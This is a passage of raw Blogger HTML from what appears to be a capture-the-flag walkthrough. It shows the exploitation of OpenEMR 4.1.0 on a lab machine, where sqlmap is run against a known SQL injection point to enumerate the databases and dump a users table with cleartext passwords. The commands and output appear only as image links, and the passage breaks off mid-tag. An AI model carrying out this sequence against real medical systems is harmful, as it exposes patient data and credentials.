alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;334&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEib4j0xnwyFXXw98A-Ub9lrCHbablNo0or6qIUWbE-i0xE_O6VmV8B1ZpynJUB4yxippnl-0sJjVFwoJ1xdBj60vcqN0WQtXsS6vuTZF4BQby9Yb9uETCxqp1HVk0HNkPijkn2qogyZsBc76CjOzE2UNYxw9Pfya9hUB3jDzt0r4JwNu5zRRj2a16DjbA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgKcuBp8u6Oha0_-uANI1vkTi3aovoWB6Wz7NFYfEGF3DpGpCT6ox7gS3RV4m9WTPu8i8b1_KeWr3vCwkx4cn96nXBSew_tr81-_Wh_Pz3CQL_ZCUODHHsLiZH3ElBBiwVGrzuGl9fI1w0pxXuaIKAJVozJCLplb3QUilZHp93dhSS6CvjbuLqCr4TW7Q&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;533&quot; data-original-width=&quot;762&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgKcuBp8u6Oha0_-uANI1vkTi3aovoWB6Wz7NFYfEGF3DpGpCT6ox7gS3RV4m9WTPu8i8b1_KeWr3vCwkx4cn96nXBSew_tr81-_Wh_Pz3CQL_ZCUODHHsLiZH3ElBBiwVGrzuGl9fI1w0pxXuaIKAJVozJCLplb3QUilZHp93dhSS6CvjbuLqCr4TW7Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- There is a hidden folder called &lt;b&gt;openemr&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjuOChiK_Rsj0p5iSU_KCTsDYM7WoNY8tV3XuVmwHjtBZenZgwI7GEKpYF29g1IUoBH1sAmf4GudOzMIMSYuXggu0wK2QECiKhKgi45G5GfZxW2X6et0Kycsb94qTMuF6srGKF0rBfR5luAXtaDuBkZQJc_fSGOo7EZmNwHJiKkmrxeA-WY28cSkFe7Mg&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;117&quot; data-original-width=&quot;371&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjuOChiK_Rsj0p5iSU_KCTsDYM7WoNY8tV3XuVmwHjtBZenZgwI7GEKpYF29g1IUoBH1sAmf4GudOzMIMSYuXggu0wK2QECiKhKgi45G5GfZxW2X6et0Kycsb94qTMuF6srGKF0rBfR5luAXtaDuBkZQJc_fSGOo7EZmNwHJiKkmrxeA-WY28cSkFe7Mg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- &lt;b&gt;Openemr&lt;/b&gt; is a medical management application:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj0Shw_YYLKnHBmpv-oNwbXgDSiDn7C2cMQ8iDK2ot9oJXyQACPO9A_JtMdib7q7HLjezN_SeQG9m6JkX4EBXEK9owVmEKjQAJUMLD4dzFxz7VJQZDfUjEd4QffsEvW9HtOEGj181lrCEbzOjBHKmPoteHsimVu2_9tVwCTB2sfI0_X2neWasXdeqzfhA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;656&quot; data-original-width=&quot;723&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEj0Shw_YYLKnHBmpv-oNwbXgDSiDn7C2cMQ8iDK2ot9oJXyQACPO9A_JtMdib7q7HLjezN_SeQG9m6JkX4EBXEK9owVmEKjQAJUMLD4dzFxz7VJQZDfUjEd4QffsEvW9HtOEGj181lrCEbzOjBHKmPoteHsimVu2_9tVwCTB2sfI0_X2neWasXdeqzfhA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for exploits for&lt;b&gt; Openemr version 4.1.0&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjWt70kubvgu7-1zx5_ooMDBJZ1FYfXKh6-aRostsyQQjLEKkr4bPMUg-NB1R417BrE6c7PpMQMCnqpT7Qw5tI_5QPJpnL_HTFQOSULkiG8pCLuJ4k6hbPuKd6VGGQtG9Ut7Q22A2y2hv7YWC4jYLmwVY2KS537BXWZwyTNESN9MdCf0m3vAx7xslzZUA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;210&quot; data-original-width=&quot;390&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjWt70kubvgu7-1zx5_ooMDBJZ1FYfXKh6-aRostsyQQjLEKkr4bPMUg-NB1R417BrE6c7PpMQMCnqpT7Qw5tI_5QPJpnL_HTFQOSULkiG8pCLuJ4k6hbPuKd6VGGQtG9Ut7Q22A2y2hv7YWC4jYLmwVY2KS537BXWZwyTNESN9MdCf0m3vAx7xslzZUA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh0DxtJVKZh_uwqUwdeFrGmKiTi-afFvIv65qK6L7uEB75YOCVMAxfEX7gPhBkVDYCXyMNiiaS0K94KvuyMTo4XdClmYrYafzOBFwCpMHNEkOjB4rwFO1dkyfcd6-pRk1pMX3Jl2gop4O7OVOnouIXvRIHt9H6-sUZsEkfpmMnLPmphE4qI4SGwNpYlvA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;168&quot; data-original-width=&quot;325&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh0DxtJVKZh_uwqUwdeFrGmKiTi-afFvIv65qK6L7uEB75YOCVMAxfEX7gPhBkVDYCXyMNiiaS0K94KvuyMTo4XdClmYrYafzOBFwCpMHNEkOjB4rwFO1dkyfcd6-pRk1pMX3Jl2gop4O7OVOnouIXvRIHt9H6-sUZsEkfpmMnLPmphE4qI4SGwNpYlvA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;49742.py &lt;/b&gt;there is a vulnerable injection point that can be used with&lt;b&gt; Sqlmap:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTmGTA_W0bYB5c2XY7BeIwM8AahlBVcjHRRbJ9crnZJeaZQDMPBPVF3dB_lqxFqAyRm3q87s3m5gSy8QyGoX3mRUTNr1axUScAoULx2sDdctIBOG_7q31Tj-0kL37wYJDhP9rEK2yq51vgcmb7HOkx7UwrjT-xg-okr8gT7odjG7Q8P3fwsZ4_3ccL-w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;775&quot; data-original-width=&quot;985&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjTmGTA_W0bYB5c2XY7BeIwM8AahlBVcjHRRbJ9crnZJeaZQDMPBPVF3dB_lqxFqAyRm3q87s3m5gSy8QyGoX3mRUTNr1axUScAoULx2sDdctIBOG_7q31Tj-0kL37wYJDhP9rEK2yq51vgcmb7HOkx7UwrjT-xg-okr8gT7odjG7Q8P3fwsZ4_3ccL-w=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for databases with &lt;b&gt;Sqlmap&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhh16mOCLy6u9EoOwmrHkw3HUkcc0vj-pPszyBVaM4f1YTk_Uq7t8ICQ7X5twSvo5H7IlrBsxEcmiAhuUC3WC8lf-RqkVd5RB_Zkf15vyVhUtH8uat0chPbonCiVAFuTEHTj0J2j0Q0_Za2530SikJuirAITYBWa_A8cQSda08V0gjQbhx-9sRVPQqPtA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;56&quot; data-original-width=&quot;1027&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhh16mOCLy6u9EoOwmrHkw3HUkcc0vj-pPszyBVaM4f1YTk_Uq7t8ICQ7X5twSvo5H7IlrBsxEcmiAhuUC3WC8lf-RqkVd5RB_Zkf15vyVhUtH8uat0chPbonCiVAFuTEHTj0J2j0Q0_Za2530SikJuirAITYBWa_A8cQSda08V0gjQbhx-9sRVPQqPtA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilzVdOD-c77DXb46jLxU8vaC5VOGgBczxwPK1f6I0KPb_Ql4c1a7PQuiYdDoyjLdrKD_6j3jG-3JuyrW3sm70_cQHe-cjAeuruOhXd-Li38aoXWssiMe1G6FFcQBUiLDuv_fiee6W2Fd_3BSFG2mxnV0AvYXXuAwsYhfLXsfwv3VAblOcFb-7uHRFoUA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;286&quot; data-original-width=&quot;602&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEilzVdOD-c77DXb46jLxU8vaC5VOGgBczxwPK1f6I0KPb_Ql4c1a7PQuiYdDoyjLdrKD_6j3jG-3JuyrW3sm70_cQHe-cjAeuruOhXd-Li38aoXWssiMe1G6FFcQBUiLDuv_fiee6W2Fd_3BSFG2mxnV0AvYXXuAwsYhfLXsfwv3VAblOcFb-7uHRFoUA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for tables inside database &lt;b&gt;openemr&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEit0X3okTO8KSByVzlbBPURWKXkAi_3lG5AbQ4stKsxurF_W5fODe-9p5oNny7wcyyEJryfK6YYElXdl3Ha9a3eJwC7DhjV9wp3x28wHIS33dxIO3luDPN-KuBl0KKnkFIWMkZO1eH4OTXbon6X5f34xw4fyuOwPhNhxoxiJGyIX8Q7zPte03O8nFiU-Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;63&quot; data-original-width=&quot;1114&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEit0X3okTO8KSByVzlbBPURWKXkAi_3lG5AbQ4stKsxurF_W5fODe-9p5oNny7wcyyEJryfK6YYElXdl3Ha9a3eJwC7DhjV9wp3x28wHIS33dxIO3luDPN-KuBl0KKnkFIWMkZO1eH4OTXbon6X5f34xw4fyuOwPhNhxoxiJGyIX8Q7zPte03O8nFiU-Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiRubcE-rmV3y4bw91HBPb81Z0JYVsg1D1CKNDw6bIrc-R8WWYpwnnC04NTIfCV8kZRSVAXOSrYLH8lTESqNRbjN1sP8NUv8AAwsVszSu7hwO_nhfNOxv1SnMYUSzlbuNw6LfeftPip_GtpRtBlGPIRj87LMLVfhjLg7MyQADHlzchOvjPLMjYSNhCp5A&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;182&quot; data-original-width=&quot;398&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiRubcE-rmV3y4bw91HBPb81Z0JYVsg1D1CKNDw6bIrc-R8WWYpwnnC04NTIfCV8kZRSVAXOSrYLH8lTESqNRbjN1sP8NUv8AAwsVszSu7hwO_nhfNOxv1SnMYUSzlbuNw6LfeftPip_GtpRtBlGPIRj87LMLVfhjLg7MyQADHlzchOvjPLMjYSNhCp5A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;.....................................&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirdrW1Jqj8dAySWVxWiyPV-Io0SviKbCPS244I7M6uleWgg8x4Duuweq1ENLNYng0vihLyqynZEhy2USsSAPY8bPKUoX2bez8qEMUmmtRCDlrNcVjrg8Ke1CnxBVDBlfqpRMCsyay8BdRVWXCpY39iDILyjacIfWvaMJ77RDk72JW3edWpII5-LH58Gw&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;185&quot; data-original-width=&quot;406&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEirdrW1Jqj8dAySWVxWiyPV-Io0SviKbCPS244I7M6uleWgg8x4Duuweq1ENLNYng0vihLyqynZEhy2USsSAPY8bPKUoX2bez8qEMUmmtRCDlrNcVjrg8Ke1CnxBVDBlfqpRMCsyay8BdRVWXCpY39iDILyjacIfWvaMJ77RDk72JW3edWpII5-LH58Gw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dumping all about table &lt;b&gt;users &lt;/b&gt;we find cleartext passwords for two users:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhKZ0ep5KSMNRCQS444Dlx7XBtyhRv__chvBkhX-EAjhvWDQnAwSAvgtldotMm5DC_93hYwl8djuzxWH2lnUTP9isjRxl3CEENpoA0pVImSdSQWsoA2xEufqn2eO7atUJTQEiSDL4iXBPyyNOXQk47aUJzEgQxeA7sNEj-z4dxCqqOzaGAD3-9P07eV9g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;54&quot; data-original-width=&quot;1264&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhKZ0ep5KSMNRCQS444Dlx7XBtyhRv__chvBkhX-EAjhvWDQnAwSAvgtldotMm5DC_93hYwl8djuzxWH2lnUTP9isjRxl3CEENpoA0pVImSdSQWsoA2xEufqn2eO7atUJTQEiSDL4iXBPyyNOXQk47aUJzEgQxeA7sNEj-z4dxCqqOzaGAD3-9P07eV9g=s16000&quot; 